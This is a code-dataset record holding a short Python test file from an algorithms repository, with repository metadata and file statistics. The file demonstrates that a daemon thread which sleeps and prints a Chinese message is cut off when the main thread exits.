hydrographyFlowline, hydrographyWaterbody,cellsize) | 43 | 67 | 0.757475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.461794 |
fc5346e19911a49d8686625f457f771311d07483 | 324 | py | Python | Codes/gracekoo/test.py | ghoslation/algorithm | 5708bf89e59a80cd0f50f2e6138f069b4f9bc96e | [
"Apache-2.0"
] | 256 | 2017-10-25T13:02:15.000Z | 2022-02-25T13:47:59.000Z | Codes/gracekoo/test.py | IYoreI/Algorithm | 0addf0cda0ec9e3f46c480eeda3a8ecb64c94121 | [
"Apache-2.0"
] | 56 | 2017-10-27T01:34:20.000Z | 2022-03-01T00:20:55.000Z | Codes/gracekoo/test.py | IYoreI/Algorithm | 0addf0cda0ec9e3f46c480eeda3a8ecb64c94121 | [
"Apache-2.0"
] | 83 | 2017-10-25T12:51:53.000Z | 2022-02-15T08:27:03.000Z | # -*- coding: utf-8 -*-
# @Time: 2020/11/8 23:47
# @Author: GraceKoo
# @File: test.py
# @Desc:
from threading import Thread
import time
def print_numbers():
time.sleep(0.2)
print("子线程结束")
if __name__ == "__main__":
t1 = Thread(target=print_numbers)
t1.setDaemon(True)
t1.start()
# print("主线程结束")
| 16.2 | 37 | 0.623457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 143 | 0.415698 |